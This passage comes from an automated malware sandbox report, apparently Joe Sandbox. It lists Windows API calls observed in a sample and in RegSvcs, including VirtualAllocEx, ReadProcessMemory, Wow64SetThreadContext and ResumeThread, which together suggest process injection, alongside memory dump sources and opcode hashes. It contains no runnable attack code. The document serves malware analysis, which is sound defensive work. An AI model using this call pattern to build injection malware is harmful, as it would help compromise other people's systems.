                                                                      • Instruction Fuzzy Hash: D8216AB1D103099FDB10DFAAC485BEEBBF4EF48310F10842AD459A7240CB789945CFA0

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A8D7D6,?,?,?,?,?), ref: 02A8D897
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 9b2b0bbc9c3b3978f5370bd8490baabc76644e4a4b1a1ecbb65acc1296e399a6
                                                                      • Instruction ID: 5549022740e605b65f27415733202b5ea266bb3c97bd548c9c3c442cfdf8241f
                                                                      • Opcode Fuzzy Hash: 9b2b0bbc9c3b3978f5370bd8490baabc76644e4a4b1a1ecbb65acc1296e399a6
                                                                      • Instruction Fuzzy Hash: DB2105B5D002489FDB10DFAAD984ADEBBF4FB48310F10841AE914A7350D774A944CFA4

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A8D7D6,?,?,?,?,?), ref: 02A8D897
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 12ce3fae42130997edb3c6078aaa7aff5f296be7e5202e04b6a27c584068ebd4
                                                                      • Instruction ID: 6b5a017e04231d8a3765aaaac5e6757bc32e3a76ea0657602fa6cae7b50935a8
                                                                      • Opcode Fuzzy Hash: 12ce3fae42130997edb3c6078aaa7aff5f296be7e5202e04b6a27c584068ebd4
                                                                      • Instruction Fuzzy Hash: 5F2103B5D00248AFDB20DFAAD884ADEBFF5FB48320F14841AE914A7250D774AA44CF61
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0732E088
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: ebb5a4cf78fd06687fb490abce214520d4c1935fa05302285172fbae2c14924e
                                                                      • Instruction ID: ff7781ff969eea0e00658eccfe42fa184a316ca7b2a4afbb0505922202b40b06
                                                                      • Opcode Fuzzy Hash: ebb5a4cf78fd06687fb490abce214520d4c1935fa05302285172fbae2c14924e
                                                                      • Instruction Fuzzy Hash: 502148B1C003599FDB10DFAAC881BEEBBF5FF48310F508429E918A7240C7399901DBA1

                                                                      Control-flow Graph (rendered graph data omitted)
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0732D9F6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: c1fd1f43568d709e2e81c0e6c58d41a6d2d46f2281e1ad98feae09d666e18ad9
                                                                      • Instruction ID: 0c385a86e00357c41d6e837815fda1f0f77bfab14bca771bdd84247554c8d90b
                                                                      • Opcode Fuzzy Hash: c1fd1f43568d709e2e81c0e6c58d41a6d2d46f2281e1ad98feae09d666e18ad9
                                                                      • Instruction Fuzzy Hash: FE2138B1D103098FDB20DFAAC485BAEBBF4EF48320F54842AD459A7240CB789945CFA4
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0732DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: a3c2c0858b2acc145371b861bb61af046ba33387cc31a78a10682ed21d38b7cc
                                                                      • Instruction ID: d332200cf3987c31a98e236bed9f0920b1b7fbb1a09552e89bdce03d1547e4e2
                                                                      • Opcode Fuzzy Hash: a3c2c0858b2acc145371b861bb61af046ba33387cc31a78a10682ed21d38b7cc
                                                                      • Instruction Fuzzy Hash: BD2156758003499FDB20DFAAC844BDEBBF5EB48320F108819E519A7250CB35A901CBA1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: dfe1c33d29bdfb127c99d4f0df038a29e6b90ea3c4c050ec748b73dbd6c0c241
                                                                      • Instruction ID: 22a11c41d927d74b2dbbafe6b751f4da407411ce04bc8ef426ac8c9c91f51778
                                                                      • Opcode Fuzzy Hash: dfe1c33d29bdfb127c99d4f0df038a29e6b90ea3c4c050ec748b73dbd6c0c241
                                                                      • Instruction Fuzzy Hash: BF1158B5D003498FDB20DFAAD8457EEFBF5EB88320F248429D419A7240CB35A945CB94
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0732DEC6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 339be0c2cc78e74a95df0834f9a50018a1b99e0ff9e8315bfeb6809875d26a52
                                                                      • Instruction ID: 417f129ac513c247d10c6063b509be2c9e5e146043f21eac8406adf0dfa111e5
                                                                      • Opcode Fuzzy Hash: 339be0c2cc78e74a95df0834f9a50018a1b99e0ff9e8315bfeb6809875d26a52
                                                                      • Instruction Fuzzy Hash: 53115675D003499FDB24DFAAC844BDEBBF5EB48320F108819E519A7250CB35A941CFA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349604324.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7320000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 4ccd875a1ffbb29d436434dfa7cdc658eb175324cccdd666ea7dfa7fac19f53f
                                                                      • Instruction ID: a3ff7437515bf559a933925650c2aeea18ddcd01d00ad4506bb0bd231fd99ccd
                                                                      • Opcode Fuzzy Hash: 4ccd875a1ffbb29d436434dfa7cdc658eb175324cccdd666ea7dfa7fac19f53f
                                                                      • Instruction Fuzzy Hash: D2113AB5D003498FDB24DFAAC8457AEFBF5EB88320F248419D519A7240CB75A941CF94
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02A8B17E
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1333005216.0000000002A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_2a80000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 97fbc386ea09bb801dcdbd79790c27594cd31f35107a6ca9674557b2b6cb36cd
                                                                      • Instruction ID: e082b2d2bb9c49c7f389f4f7276a62122c5725a6a2f7be99bdb5b605ba814609
                                                                      • Opcode Fuzzy Hash: 97fbc386ea09bb801dcdbd79790c27594cd31f35107a6ca9674557b2b6cb36cd
                                                                      • Instruction Fuzzy Hash: D21113B5C003498FCB20DF9AC884BDEFBF4EB48314F10841AD419A7210C779A545CFA1
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0B96149D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1351075415.000000000B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_b960000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 49fea4e4069581c02fe535abc0fd7eceb6a158ac1a3f511bcbc4183b7dc520b7
                                                                      • Instruction ID: bddf1d2e76023268b1fe9f3fde9b2c397f8cf5c8d05fef9b94ef852828d3bcee
                                                                      • Opcode Fuzzy Hash: 49fea4e4069581c02fe535abc0fd7eceb6a158ac1a3f511bcbc4183b7dc520b7
                                                                      • Instruction Fuzzy Hash: 4A11F5B58003499FDB20DF9AD845BDEBFF8EB48320F10885AE554A7240C375A944CFA1
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0B96149D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1351075415.000000000B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B960000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_b960000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 4b03d047e188870058b5959a9cc71fd74349d6af8a3e6c5b7428d3b06334bfe7
                                                                      • Instruction ID: 7464384eea132f6993353b1bc229862d0774642d4cfdde04672832c0ac34784a
                                                                      • Opcode Fuzzy Hash: 4b03d047e188870058b5959a9cc71fd74349d6af8a3e6c5b7428d3b06334bfe7
                                                                      • Instruction Fuzzy Hash: BB11D3B58003599FDB20DF9AD985BDEBBF8EB48320F108459E518A7250C375A944CFA5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 81a3273d9f961d6cd1c3cc6932c41dcffe4bf18eaca8da2b36d0f8fe7094e48b
                                                                      • Instruction ID: 55f63783c69ea4deb917cb838fb17fa02b6ebe6320ca2775659a33fdc8115680
                                                                      • Opcode Fuzzy Hash: 81a3273d9f961d6cd1c3cc6932c41dcffe4bf18eaca8da2b36d0f8fe7094e48b
                                                                      • Instruction Fuzzy Hash: 562136B1604200DFDB15DF54D9C0B2ABFA1FB94318F20C1B9E8890B246C736D456CBA2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ea92b92666f4781b8d49b0232e04cf12df60da929e83b4340d33b6677de01d2
                                                                      • Instruction ID: 7f8eac67e8167aa216b259e10241f100d6f3f1a96ff0ebd66d6b5ac5e9960aa3
                                                                      • Opcode Fuzzy Hash: 5ea92b92666f4781b8d49b0232e04cf12df60da929e83b4340d33b6677de01d2
                                                                      • Instruction Fuzzy Hash: 362121B1604200DFDB05DF54D9C0B5ABBA5FBE8324F20C1B9E9490B246C73AE456CBA2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f00f81ae8802ce990fdbc647e28f8b5dced577027c01ee2527e812c97cef026
                                                                      • Instruction ID: aa12418dc8b7430ddb8b01cc82c67359fe1468644b22d7139663bd312e045e2a
                                                                      • Opcode Fuzzy Hash: 9f00f81ae8802ce990fdbc647e28f8b5dced577027c01ee2527e812c97cef026
                                                                      • Instruction Fuzzy Hash: 8B21D375604300AFDB95DF94D9C4B16BBA5FB94324F20C5AEDC894B252C336D446CB61
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bb5f56df220acc69a9604da91ed042c335bb93631e88e2c89a8aa58119c5440
                                                                      • Instruction ID: 7be2e0c7005328ed05081746614ab6bf5dd7c53959c4f7ca0fac1e1dcbf363cc
                                                                      • Opcode Fuzzy Hash: 5bb5f56df220acc69a9604da91ed042c335bb93631e88e2c89a8aa58119c5440
                                                                      • Instruction Fuzzy Hash: F921F171604200DFDB55DF54D984B16BBA5EB84214F20C5AAEC894B246C336D807CB62
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0aea8175f9e63feaed4a266fb8d36f90b4583829352087b5d37b573ab75d2718
                                                                      • Instruction ID: 04d16bdc901f58c3ea0a4604c88c9c24faa4010482f5bdeb5e48f5a9160a8807
                                                                      • Opcode Fuzzy Hash: 0aea8175f9e63feaed4a266fb8d36f90b4583829352087b5d37b573ab75d2718
                                                                      • Instruction Fuzzy Hash: FB2192755093808FDB56CF64D990715BFB1EB45214F28C5DBD8898B2A7C33A980ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction ID: 0b400eec5e266f5c67aa5ea4238e6365661c8fb7105913e4b8372ce5e0fe41be
                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction Fuzzy Hash: 8711DFB6504240CFCB06CF54D5C0B56BFB2FB94324F24C2A9D8490B257C33AE456CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction ID: fca69411071fed69b53e781144474e0092614a6d2944ae40bfe4b24b85f2a514
                                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                      • Instruction Fuzzy Hash: E811DFB6504280CFCB06CF54D5C0B16BFB2FB94324F24C6A9D8490B256C336D456CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331495562.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_105d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                      • Instruction ID: 20d630c910db088803784ea3045808fbc3d0fc17803996275b17c812a69ffc7a
                                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                      • Instruction Fuzzy Hash: 9711BB75504280DFCB46CF54C5C0B16BBA2FB84324F24C6AEDC894B296C33AD44ACB61
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 90e494e8480c3e73aa30675bad0f24703fef432763cf0f1d26f26bb9164c6d8b
                                                                      • Instruction ID: 35f220b57405af8a4e7228d157a03d93ff82dbd580cf61c23333a41d5e9c9770
                                                                      • Opcode Fuzzy Hash: 90e494e8480c3e73aa30675bad0f24703fef432763cf0f1d26f26bb9164c6d8b
                                                                      • Instruction Fuzzy Hash: AA01F7B15043849BF7209A65DCC476AFFD8FF50225F14C5BAED884E282E2389840CBB2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1331273559.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_104d000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8c296ec0e9249e1a36199e005a412d6acda46e0d11c25398c3e094942b550ca
                                                                      • Instruction ID: a1280942ea036aedbea2ab42b4fa2bbefad84201cbbbf5f7e0b64d59260f3576
                                                                      • Opcode Fuzzy Hash: d8c296ec0e9249e1a36199e005a412d6acda46e0d11c25398c3e094942b550ca
                                                                      • Instruction Fuzzy Hash: 64F0C2710043849FE7108A19DCC4B66FFD8EB90334F18C5AAED484E283D2789840CB71
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 440ee4fd8fce31542233cff6ef40215e6fe58c8dc10c8d6805479239c14e3e88
                                                                      • Instruction ID: 031a2c8bf4529fecd663fcd350e0592c1740e750aba662e225cbe53a6801c26e
                                                                      • Opcode Fuzzy Hash: 440ee4fd8fce31542233cff6ef40215e6fe58c8dc10c8d6805479239c14e3e88
                                                                      • Instruction Fuzzy Hash: 8D21A1F26047529FDB26AF78E8604D8FBB1EF8221070541A7D044DB2A2D7309899CBD2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1349465431.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7300000_nYNBzxFhCu.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 85ea120152c256f2d13ea433821ee04dff60b0c53cf86e18b0488141c33a0e6d
                                                                      • Instruction ID: ba928996c3745a0c21e3f32ce0a19b1ee98f201aa1aba42297da8857be2d37c3
                                                                      • Opcode Fuzzy Hash: 85ea120152c256f2d13ea433821ee04dff60b0c53cf86e18b0488141c33a0e6d
                                                                      • Instruction Fuzzy Hash: 372179B5A00359CFEB18DFA8C468ADDB7B2EF46311F040469D409AB3A0CB35AD85CF81

                                                                      Execution Graph

                                                                      Execution Coverage: 9.7%
                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 137
                                                                      Total number of Limit Nodes: 17
                                                                      execution_graph: serialized node/edge list of the rendered execution graph (graph image not captured; entry nodes at 64ae628, 59aaa98, 1537358 and 143d01c). API calls reached in the graph: GlobalMemoryStatusEx, GetModuleHandleW, CreateWindowExW, DeleteFileW, CallWindowProcW.

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 59aad60-59aafe0; calls 59aa110, 59aafe9, 59aa11c, 59a32c4, 59a8c80, 59aa12c; API GetModuleHandleW in block 59aaf98-59aafc3.
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: eedfc926674274cf1272b648582f8b45504108368fea1377ac2844d8a011510c
                                                                      • Instruction ID: dfddf7fc58862524c191a64b69875ab89418289e08cb24edb660b6fdbc7b71c8
                                                                      • Opcode Fuzzy Hash: eedfc926674274cf1272b648582f8b45504108368fea1377ac2844d8a011510c
                                                                      • Instruction Fuzzy Hash: 4A814871A00B059FD724DF2AD44476ABBF6FF88200F10892DD456DBA50D775E949CBE0

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 59acee5-59ad0a1; calls 59aa2cc; API CreateWindowExW in block 59acfb3-59ad052.
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059AD042
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: abf42b1290de216bea26beea4cdabc75a665ce48ab2ac989347a9474467894bb
                                                                      • Instruction ID: 2645e5c85f9e7879da4a9f7201b2417226df6afea90680aa1738d23ceaf749a0
                                                                      • Opcode Fuzzy Hash: abf42b1290de216bea26beea4cdabc75a665ce48ab2ac989347a9474467894bb
                                                                      • Instruction Fuzzy Hash: B251E072C00349AFDF15CF99C884ADEBFB6BF48310F54812AE918AB220D7759995CF90

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 59acf24-59ad0a1; API CreateWindowExW in block 59acff3-59ad052.
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059AD042
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 2f9d0fa37100d159defabc15563ffb7cdf1cf7bf5f8f2a5e79e934a5cf460d9f
                                                                      • Instruction ID: a1918f8c3e8cf381d6deacbfaf335d2fe2968dd0fd76670e145f2e88dde4b7e4
                                                                      • Opcode Fuzzy Hash: 2f9d0fa37100d159defabc15563ffb7cdf1cf7bf5f8f2a5e79e934a5cf460d9f
                                                                      • Instruction Fuzzy Hash: 8751BFB1D003599FDB14CFA9C884ADEBFB5FF48310F64812AE819AB250D7759985CF90

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 59acf30-59ad0a1; API CreateWindowExW in block 59acff3-59ad052.
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 059AD042
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: bca15b31a5b675699b18da4d7ece6771467e3d6db7bfe3e3a4d2c3e99b4d12f0
                                                                      • Instruction ID: efb72deda489544fa79a9f5a0b91beaa0fed1e3fb595ef32f5697bb6ed468094
                                                                      • Opcode Fuzzy Hash: bca15b31a5b675699b18da4d7ece6771467e3d6db7bfe3e3a4d2c3e99b4d12f0
                                                                      • Instruction Fuzzy Hash: B441AEB1D103199FDB14CF99C884ADEBFB5FF48310F64812AE819AB250D7759985CF90

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 59aa41c-59af79c; calls 59aa2f4; API CallWindowProcW in block 59af71a-59af752.
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 059AF741
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2479900105.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_59a0000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: cb7b57e764c2e4384fd929beb78e312ca30449b077857a436fb1b238225c0492
                                                                      • Instruction ID: 1742ed16ada2ada3f7b3c83f5eeb5099b1dfc19cc45d08392ff3b03308a7f3ba
                                                                      • Opcode Fuzzy Hash: cb7b57e764c2e4384fd929beb78e312ca30449b077857a436fb1b238225c0492
                                                                      • Instruction Fuzzy Hash: 88412AB9A003098FDB15CF99C448BAABBF5FF88314F258859D519AB321D774A841CFA0

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 1537350-1537406; API DeleteFileW in block 15373aa-15373d5.
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 015373C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2468113438.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1530000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: f6294b8e22670b9f60e196f5aad2de937fd935deb8c0cd9310e7b6e530c2407d
                                                                      • Instruction ID: 94a902a855b02c5b0b570eee65bf9bf0d78c9d1e474d870275bef06392f587a9
                                                                      • Opcode Fuzzy Hash: f6294b8e22670b9f60e196f5aad2de937fd935deb8c0cd9310e7b6e530c2407d
                                                                      • Instruction Fuzzy Hash: 482129B1C0065A9FDB14CF99D5457AEFBF0FF48320F11852AD814A7640D7389945CFA0

                                                                      Control-flow Graph

                                                                      control_flow_graph (executed/not-executed graph omitted): function at 1537358-1537406; API DeleteFileW in block 15373aa-15373d5.
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 015373C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.2468113438.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_1530000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: ff1b767abbea523b7a36ef3cec16182e7c9d48fa4a483b69492b77518c6f4e4f
